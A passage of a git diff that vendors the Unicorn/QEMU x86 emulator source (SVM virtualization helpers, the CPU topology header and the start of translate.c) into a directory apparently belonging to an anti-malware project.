svm_save_seg(CPUX86State *env, hwaddr addr, + const SegmentCache *sc) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + stw_phys(cs->as, addr + offsetof(struct vmcb_seg, selector), + sc->selector); + stq_phys(cs->as, addr + offsetof(struct vmcb_seg, base), + sc->base); + stl_phys(cs->as, addr + offsetof(struct vmcb_seg, limit), + sc->limit); + stw_phys(cs->as, addr + offsetof(struct vmcb_seg, attrib), + ((sc->flags >> 8) & 0xff) | ((sc->flags >> 12) & 0x0f00)); +} + +static inline void svm_load_seg(CPUX86State *env, hwaddr addr, + SegmentCache *sc) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + unsigned int flags; + + sc->selector = lduw_phys(cs->as, + addr + offsetof(struct vmcb_seg, selector)); + sc->base = ldq_phys(cs->as, addr + 
offsetof(struct vmcb_seg, base)); + sc->limit = ldl_phys(cs->as, addr + offsetof(struct vmcb_seg, limit)); + flags = lduw_phys(cs->as, addr + offsetof(struct vmcb_seg, attrib)); + sc->flags = ((flags & 0xff) << 8) | ((flags & 0x0f00) << 12); +} + +static inline void svm_load_seg_cache(CPUX86State *env, hwaddr addr, + int seg_reg) +{ + SegmentCache sc1, *sc = &sc1; + + svm_load_seg(env, addr, sc); + cpu_x86_load_seg_cache(env, seg_reg, sc->selector, + sc->base, sc->limit, sc->flags); +} + +void helper_vmrun(CPUX86State *env, int aflag, int next_eip_addend) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + target_ulong addr; + uint32_t event_inj; + uint32_t int_ctl; + + cpu_svm_check_intercept_param(env, SVM_EXIT_VMRUN, 0); + + if (aflag == 2) { + addr = env->regs[R_EAX]; + } else { + addr = (uint32_t)env->regs[R_EAX]; + } + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmrun! " TARGET_FMT_lx "\n", addr); + + env->vm_vmcb = addr; + + /* save the current CPU state in the hsave page */ + stq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.gdtr.base), + env->gdt.base); + stl_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.gdtr.limit), + env->gdt.limit); + + stq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.idtr.base), + env->idt.base); + stl_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.idtr.limit), + env->idt.limit); + + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.cr0), env->cr[0]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.cr2), env->cr[2]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.cr3), env->cr[3]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.cr4), env->cr[4]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.dr6), env->dr[6]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.dr7), env->dr[7]); + + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.efer), env->efer); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct 
vmcb, save.rflags), + cpu_compute_eflags(env)); + + svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.es), + &env->segs[R_ES]); + svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.cs), + &env->segs[R_CS]); + svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.ss), + &env->segs[R_SS]); + svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.ds), + &env->segs[R_DS]); + + stq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.rip), + env->eip + next_eip_addend); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.rsp), env->regs[R_ESP]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.rax), env->regs[R_EAX]); + + /* load the interception bitmaps so we do not need to access the + vmcb in svm mode */ + env->intercept = ldq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.intercept)); + env->intercept_cr_read = lduw_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_cr_read)); + env->intercept_cr_write = lduw_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_cr_write)); + env->intercept_dr_read = lduw_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_dr_read)); + env->intercept_dr_write = lduw_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_dr_write)); + env->intercept_exceptions = ldl_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_exceptions + )); + + /* enable intercepts */ + env->hflags |= HF_SVMI_MASK; + + env->tsc_offset = ldq_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, control.tsc_offset)); + + env->gdt.base = ldq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + save.gdtr.base)); + env->gdt.limit = ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + save.gdtr.limit)); + + env->idt.base = ldq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + save.idtr.base)); + env->idt.limit = ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + save.idtr.limit)); + + 
/* clear exit_info_2 so we behave like the real hardware */ + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), 0); + + cpu_x86_update_cr0(env, ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, + save.cr0))); + cpu_x86_update_cr4(env, ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, + save.cr4))); + cpu_x86_update_cr3(env, ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, + save.cr3))); + env->cr[2] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr2)); + int_ctl = ldl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_ctl)); + env->hflags2 &= ~(HF2_HIF_MASK | HF2_VINTR_MASK); + if (int_ctl & V_INTR_MASKING_MASK) { + env->v_tpr = int_ctl & V_TPR_MASK; + env->hflags2 |= HF2_VINTR_MASK; + if (env->eflags & IF_MASK) { + env->hflags2 |= HF2_HIF_MASK; + } + } + + cpu_load_efer(env, + ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.efer))); + env->eflags = 0; + cpu_load_eflags(env, ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, + save.rflags)), + ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); + + svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.es), + R_ES); + svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.cs), + R_CS); + svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.ss), + R_SS); + svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.ds), + R_DS); + + env->eip = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rip)); + + env->regs[R_ESP] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rsp)); + env->regs[R_EAX] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rax)); + env->dr[7] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.dr7)); + env->dr[6] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.dr6)); + + /* FIXME: guest state consistency checks */ + + switch (ldub_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, 
control.tlb_ctl))) { + case TLB_CONTROL_DO_NOTHING: + break; + case TLB_CONTROL_FLUSH_ALL_ASID: + /* FIXME: this is not 100% correct but should work for now */ + tlb_flush(cs, 1); + break; + } + + env->hflags2 |= HF2_GIF_MASK; + + if (int_ctl & V_IRQ_MASK) { + CPUState *cs = CPU(x86_env_get_cpu(env)); + + cs->interrupt_request |= CPU_INTERRUPT_VIRQ; + } + + /* maybe we need to inject an event */ + event_inj = ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj)); + if (event_inj & SVM_EVTINJ_VALID) { + uint8_t vector = event_inj & SVM_EVTINJ_VEC_MASK; + uint16_t valid_err = event_inj & SVM_EVTINJ_VALID_ERR; + uint32_t event_inj_err = ldl_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.event_inj_err)); + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "Injecting(%#hx): ", valid_err); + /* FIXME: need to implement valid_err */ + switch (event_inj & SVM_EVTINJ_TYPE_MASK) { + case SVM_EVTINJ_TYPE_INTR: + cs->exception_index = vector; + env->error_code = event_inj_err; + env->exception_is_int = 0; + env->exception_next_eip = -1; + qemu_log_mask(CPU_LOG_TB_IN_ASM, "INTR"); + /* XXX: is it always correct? 
*/ + do_interrupt_x86_hardirq(env, vector, 1); + break; + case SVM_EVTINJ_TYPE_NMI: + cs->exception_index = EXCP02_NMI; + env->error_code = event_inj_err; + env->exception_is_int = 0; + env->exception_next_eip = env->eip; + qemu_log_mask(CPU_LOG_TB_IN_ASM, "NMI"); + cpu_loop_exit(cs); + break; + case SVM_EVTINJ_TYPE_EXEPT: + cs->exception_index = vector; + env->error_code = event_inj_err; + env->exception_is_int = 0; + env->exception_next_eip = -1; + qemu_log_mask(CPU_LOG_TB_IN_ASM, "EXEPT"); + cpu_loop_exit(cs); + break; + case SVM_EVTINJ_TYPE_SOFT: + cs->exception_index = vector; + env->error_code = event_inj_err; + env->exception_is_int = 1; + env->exception_next_eip = env->eip; + qemu_log_mask(CPU_LOG_TB_IN_ASM, "SOFT"); + cpu_loop_exit(cs); + break; + } + qemu_log_mask(CPU_LOG_TB_IN_ASM, " %#x %#x\n", cs->exception_index, + env->error_code); + } +} + +void helper_vmmcall(CPUX86State *env) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_VMMCALL, 0); + raise_exception(env, EXCP06_ILLOP); +} + +void helper_vmload(CPUX86State *env, int aflag) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + target_ulong addr; + + cpu_svm_check_intercept_param(env, SVM_EXIT_VMLOAD, 0); + + if (aflag == 2) { + addr = env->regs[R_EAX]; + } else { + addr = (uint32_t)env->regs[R_EAX]; + } + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmload! 
" TARGET_FMT_lx + "\nFS: %016" PRIx64 " | " TARGET_FMT_lx "\n", + addr, ldq_phys(cs->as, addr + offsetof(struct vmcb, + save.fs.base)), + env->segs[R_FS].base); + + svm_load_seg_cache(env, addr + offsetof(struct vmcb, save.fs), R_FS); + svm_load_seg_cache(env, addr + offsetof(struct vmcb, save.gs), R_GS); + svm_load_seg(env, addr + offsetof(struct vmcb, save.tr), &env->tr); + svm_load_seg(env, addr + offsetof(struct vmcb, save.ldtr), &env->ldt); + +#ifdef TARGET_X86_64 + env->kernelgsbase = ldq_phys(cs->as, addr + offsetof(struct vmcb, + save.kernel_gs_base)); + env->lstar = ldq_phys(cs->as, addr + offsetof(struct vmcb, save.lstar)); + env->cstar = ldq_phys(cs->as, addr + offsetof(struct vmcb, save.cstar)); + env->fmask = ldq_phys(cs->as, addr + offsetof(struct vmcb, save.sfmask)); +#endif + env->star = ldq_phys(cs->as, addr + offsetof(struct vmcb, save.star)); + env->sysenter_cs = ldq_phys(cs->as, + addr + offsetof(struct vmcb, save.sysenter_cs)); + env->sysenter_esp = ldq_phys(cs->as, addr + offsetof(struct vmcb, + save.sysenter_esp)); + env->sysenter_eip = ldq_phys(cs->as, addr + offsetof(struct vmcb, + save.sysenter_eip)); +} + +void helper_vmsave(CPUX86State *env, int aflag) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + target_ulong addr; + + cpu_svm_check_intercept_param(env, SVM_EXIT_VMSAVE, 0); + + if (aflag == 2) { + addr = env->regs[R_EAX]; + } else { + addr = (uint32_t)env->regs[R_EAX]; + } + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmsave! 
" TARGET_FMT_lx + "\nFS: %016" PRIx64 " | " TARGET_FMT_lx "\n", + addr, ldq_phys(cs->as, + addr + offsetof(struct vmcb, save.fs.base)), + env->segs[R_FS].base); + + svm_save_seg(env, addr + offsetof(struct vmcb, save.fs), + &env->segs[R_FS]); + svm_save_seg(env, addr + offsetof(struct vmcb, save.gs), + &env->segs[R_GS]); + svm_save_seg(env, addr + offsetof(struct vmcb, save.tr), + &env->tr); + svm_save_seg(env, addr + offsetof(struct vmcb, save.ldtr), + &env->ldt); + +#ifdef TARGET_X86_64 + stq_phys(cs->as, addr + offsetof(struct vmcb, save.kernel_gs_base), + env->kernelgsbase); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.lstar), env->lstar); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.cstar), env->cstar); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.sfmask), env->fmask); +#endif + stq_phys(cs->as, addr + offsetof(struct vmcb, save.star), env->star); + stq_phys(cs->as, + addr + offsetof(struct vmcb, save.sysenter_cs), env->sysenter_cs); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.sysenter_esp), + env->sysenter_esp); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.sysenter_eip), + env->sysenter_eip); +} + +void helper_stgi(CPUX86State *env) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_STGI, 0); + env->hflags2 |= HF2_GIF_MASK; +} + +void helper_clgi(CPUX86State *env) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_CLGI, 0); + env->hflags2 &= ~HF2_GIF_MASK; +} + +void helper_skinit(CPUX86State *env) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_SKINIT, 0); + /* XXX: not implemented */ + raise_exception(env, EXCP06_ILLOP); +} + +void helper_invlpga(CPUX86State *env, int aflag) +{ + X86CPU *cpu = x86_env_get_cpu(env); + target_ulong addr; + + cpu_svm_check_intercept_param(env, SVM_EXIT_INVLPGA, 0); + + if (aflag == 2) { + addr = env->regs[R_EAX]; + } else { + addr = (uint32_t)env->regs[R_EAX]; + } + + /* XXX: could use the ASID to see if it is needed to do the + flush */ + tlb_flush_page(CPU(cpu), addr); +} + +void 
helper_svm_check_intercept_param(CPUX86State *env, uint32_t type, + uint64_t param) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + if (likely(!(env->hflags & HF_SVMI_MASK))) { + return; + } + if ( (int32_t)type >= SVM_EXIT_READ_CR0 && type <= SVM_EXIT_READ_CR0 + 8 ) { + if (env->intercept_cr_read & (1 << (type - SVM_EXIT_READ_CR0))) { + helper_vmexit(env, type, param); + } + } else if ( type >= SVM_EXIT_WRITE_CR0 && type <= SVM_EXIT_WRITE_CR0 + 8 ) { + if (env->intercept_cr_write & (1 << (type - SVM_EXIT_WRITE_CR0))) { + helper_vmexit(env, type, param); + } + } else if ( type >= SVM_EXIT_READ_DR0 && type <= SVM_EXIT_READ_DR0 + 7 ) { + if (env->intercept_dr_read & (1 << (type - SVM_EXIT_READ_DR0))) { + helper_vmexit(env, type, param); + } + } else if ( type >= SVM_EXIT_WRITE_DR0 && type <= SVM_EXIT_WRITE_DR0 + 7 ) { + if (env->intercept_dr_write & (1 << (type - SVM_EXIT_WRITE_DR0))) { + helper_vmexit(env, type, param); + } + } else if ( type >= SVM_EXIT_EXCP_BASE && type <= SVM_EXIT_EXCP_BASE + 31 ) { + if (env->intercept_exceptions & (1 << (type - SVM_EXIT_EXCP_BASE))) { + helper_vmexit(env, type, param); + } + } else if ( type == SVM_EXIT_MSR ) { + if (env->intercept & (1ULL << (SVM_EXIT_MSR - SVM_EXIT_INTR))) { + /* FIXME: this should be read in at vmrun (faster this way?) 
*/ + uint64_t addr = ldq_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.msrpm_base_pa)); + uint32_t t0, t1; + + uint32_t ecx = (uint32_t)env->regs[R_ECX]; + if ( (int32_t)ecx >= 0 && ecx <= 0x1fff ) { + t0 = (env->regs[R_ECX] * 2) % 8; + t1 = (env->regs[R_ECX] * 2) / 8; + } else if ( ecx >= 0xc0000000 && ecx <= 0xc0001fff ) { + t0 = (8192 + env->regs[R_ECX] - 0xc0000000) * 2; + t1 = (t0 / 8); + t0 %= 8; + } else if ( ecx >= 0xc0010000 && ecx <= 0xc0011fff ) { + t0 = (16384 + env->regs[R_ECX] - 0xc0010000) * 2; + t1 = (t0 / 8); + t0 %= 8; + } else { + helper_vmexit(env, type, param); + t0 = 0; + t1 = 0; + } + if (ldub_phys(cs->as, addr + t1) & ((1 << param) << t0)) { + helper_vmexit(env, type, param); + } + } + } else { + if (env->intercept & (1ULL << (type - SVM_EXIT_INTR))) { + helper_vmexit(env, type, param); + } + } +} + +void cpu_svm_check_intercept_param(CPUX86State *env, uint32_t type, + uint64_t param) +{ + helper_svm_check_intercept_param(env, type, param); +} + +void helper_svm_check_io(CPUX86State *env, uint32_t port, uint32_t param, + uint32_t next_eip_addend) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + if (env->intercept & (1ULL << (SVM_EXIT_IOIO - SVM_EXIT_INTR))) { + /* FIXME: this should be read in at vmrun (faster this way?) 
*/ + uint64_t addr = ldq_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, control.iopm_base_pa)); + uint16_t mask = (1 << ((param >> 4) & 7)) - 1; + + if (lduw_phys(cs->as, addr + port / 8) & (mask << (port & 7))) { + /* next env->eip */ + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), + env->eip + next_eip_addend); + helper_vmexit(env, SVM_EXIT_IOIO, param | (port << 16)); + } + } +} + +/* Note: currently only 32 bits of exit_code are used */ +void helper_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + uint32_t int_ctl; + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmexit(%08x, %016" PRIx64 ", %016" + PRIx64 ", " TARGET_FMT_lx ")!\n", + exit_code, exit_info_1, + ldq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.exit_info_2)), + env->eip); + + if (env->hflags & HF_INHIBIT_IRQ_MASK) { + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_state), + SVM_INTERRUPT_SHADOW_MASK); + env->hflags &= ~HF_INHIBIT_IRQ_MASK; + } else { + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_state), 0); + } + + /* Save the VM state in the vmcb */ + svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.es), + &env->segs[R_ES]); + svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.cs), + &env->segs[R_CS]); + svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.ss), + &env->segs[R_SS]); + svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.ds), + &env->segs[R_DS]); + + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.base), + env->gdt.base); + stl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.limit), + env->gdt.limit); + + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.idtr.base), + env->idt.base); + stl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.idtr.limit), + env->idt.limit); + + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.efer), env->efer); + 
stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr0), env->cr[0]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr2), env->cr[2]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr3), env->cr[3]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr4), env->cr[4]); + + int_ctl = ldl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_ctl)); + int_ctl &= ~(V_TPR_MASK | V_IRQ_MASK); + int_ctl |= env->v_tpr & V_TPR_MASK; + if (cs->interrupt_request & CPU_INTERRUPT_VIRQ) { + int_ctl |= V_IRQ_MASK; + } + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_ctl), int_ctl); + + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.rflags), + cpu_compute_eflags(env)); + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.rip), + env->eip); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rsp), env->regs[R_ESP]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rax), env->regs[R_EAX]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.dr7), env->dr[7]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.dr6), env->dr[6]); + stb_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.cpl), + env->hflags & HF_CPL_MASK); + + /* Reload the host state from vm_hsave */ + env->hflags2 &= ~(HF2_HIF_MASK | HF2_VINTR_MASK); + env->hflags &= ~HF_SVMI_MASK; + env->intercept = 0; + env->intercept_exceptions = 0; + cs->interrupt_request &= ~CPU_INTERRUPT_VIRQ; + env->tsc_offset = 0; + + env->gdt.base = ldq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.gdtr.base)); + env->gdt.limit = ldl_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.gdtr.limit)); + + env->idt.base = ldq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.idtr.base)); + env->idt.limit = ldl_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.idtr.limit)); + + cpu_x86_update_cr0(env, ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, 
+ save.cr0)) | + CR0_PE_MASK); + cpu_x86_update_cr4(env, ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, + save.cr4))); + cpu_x86_update_cr3(env, ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, + save.cr3))); + /* we need to set the efer after the crs so the hidden flags get + set properly */ + cpu_load_efer(env, ldq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.efer))); + env->eflags = 0; + cpu_load_eflags(env, ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, + save.rflags)), + ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK | + VM_MASK)); + + svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.es), + R_ES); + svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.cs), + R_CS); + svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.ss), + R_SS); + svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.ds), + R_DS); + + env->eip = ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.rip)); + env->regs[R_ESP] = ldq_phys(cs->as, env->vm_hsave + + offsetof(struct vmcb, save.rsp)); + env->regs[R_EAX] = ldq_phys(cs->as, env->vm_hsave + + offsetof(struct vmcb, save.rax)); + + env->dr[6] = ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.dr6)); + env->dr[7] = ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.dr7)); + + /* other setups */ + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, control.exit_code), + exit_code); + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_1), + exit_info_1); + + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_int_info), + ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj))); + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_int_info_err), + ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj_err))); + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.event_inj), 0); + + env->hflags2 &= 
~HF2_GIF_MASK; + /* FIXME: Resets the current ASID register to zero (host ASID). */ + + /* Clears the V_IRQ and V_INTR_MASKING bits inside the processor. */ + + /* Clears the TSC_OFFSET inside the processor. */ + + /* If the host is in PAE mode, the processor reloads the host's PDPEs + from the page table indicated the host's CR3. If the PDPEs contain + illegal state, the processor causes a shutdown. */ + + /* Disables all breakpoints in the host DR7 register. */ + + /* Checks the reloaded host state for consistency. */ + + /* If the host's rIP reloaded by #VMEXIT is outside the limit of the + host's code segment or non-canonical (in the case of long mode), a + #GP fault is delivered inside the host. */ + + /* remove any pending exception */ + cs->exception_index = -1; + env->error_code = 0; + env->old_exception = -1; + + cpu_loop_exit(cs); +} + +void cpu_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1) +{ + helper_vmexit(env, exit_code, exit_info_1); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/topology.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/topology.h new file mode 100644 index 0000000..e18ddfb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/topology.h @@ -0,0 +1,134 @@ +/* + * x86 CPU topology data structures and functions + * + * Copyright (c) 2012 Red Hat Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. 
+ * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TARGET_I386_TOPOLOGY_H +#define TARGET_I386_TOPOLOGY_H + +/* This file implements the APIC-ID-based CPU topology enumeration logic, + * documented at the following document: + * Intel® 64 Architecture Processor Topology Enumeration + * http://software.intel.com/en-us/articles/intel-64-architecture-processor-topology-enumeration/ + * + * This code should be compatible with AMD's "Extended Method" described at: + * AMD CPUID Specification (Publication #25481) + * Section 3: Multiple Core Calcuation + * as long as: + * nr_threads is set to 1; + * OFFSET_IDX is assumed to be 0; + * CPUID Fn8000_0008_ECX[ApicIdCoreIdSize[3:0]] is set to apicid_core_width(). + */ + +#include "unicorn/platform.h" +#include + +#include "qemu/bitops.h" + +/* APIC IDs can be 32-bit, but beware: APIC IDs > 255 require x2APIC support + */ +typedef uint32_t apic_id_t; + +/* Return the bit width needed for 'count' IDs + */ +static unsigned apicid_bitwidth_for_count(unsigned count) +{ + g_assert(count >= 1); + count -= 1; + return count ? 
32 - clz32(count) : 0; +} + +/* Bit width of the SMT_ID (thread ID) field on the APIC ID + */ +static inline unsigned apicid_smt_width(unsigned nr_cores, unsigned nr_threads) +{ + return apicid_bitwidth_for_count(nr_threads); +} + +/* Bit width of the Core_ID field + */ +static inline unsigned apicid_core_width(unsigned nr_cores, unsigned nr_threads) +{ + return apicid_bitwidth_for_count(nr_cores); +} + +/* Bit offset of the Core_ID field + */ +static inline unsigned apicid_core_offset(unsigned nr_cores, + unsigned nr_threads) +{ + return apicid_smt_width(nr_cores, nr_threads); +} + +/* Bit offset of the Pkg_ID (socket ID) field + */ +static inline unsigned apicid_pkg_offset(unsigned nr_cores, unsigned nr_threads) +{ + return apicid_core_offset(nr_cores, nr_threads) + + apicid_core_width(nr_cores, nr_threads); +} + +/* Make APIC ID for the CPU based on Pkg_ID, Core_ID, SMT_ID + * + * The caller must make sure core_id < nr_cores and smt_id < nr_threads. + */ +static inline apic_id_t apicid_from_topo_ids(unsigned nr_cores, + unsigned nr_threads, + unsigned pkg_id, + unsigned core_id, + unsigned smt_id) +{ + return (pkg_id << apicid_pkg_offset(nr_cores, nr_threads)) | + (core_id << apicid_core_offset(nr_cores, nr_threads)) | + smt_id; +} + +/* Calculate thread/core/package IDs for a specific topology, + * based on (contiguous) CPU index + */ +static inline void x86_topo_ids_from_idx(unsigned nr_cores, + unsigned nr_threads, + unsigned cpu_index, + unsigned *pkg_id, + unsigned *core_id, + unsigned *smt_id) +{ + unsigned core_index = cpu_index / nr_threads; + *smt_id = cpu_index % nr_threads; + *core_id = core_index % nr_cores; + *pkg_id = core_index / nr_cores; +} + +/* Make APIC ID for the CPU 'cpu_index' + * + * 'cpu_index' is a sequential, contiguous ID for the CPU. 
+ */ +static inline apic_id_t x86_apicid_from_cpu_idx(unsigned nr_cores, + unsigned nr_threads, + unsigned cpu_index) +{ + unsigned pkg_id, core_id, smt_id; + x86_topo_ids_from_idx(nr_cores, nr_threads, cpu_index, + &pkg_id, &core_id, &smt_id); + return apicid_from_topo_ids(nr_cores, nr_threads, pkg_id, core_id, smt_id); +} + +#endif /* TARGET_I386_TOPOLOGY_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/translate.c new file mode 100644 index 0000000..cdfd714 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/translate.c @@ -0,0 +1,8812 @@ +/* + * i386 translation + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * 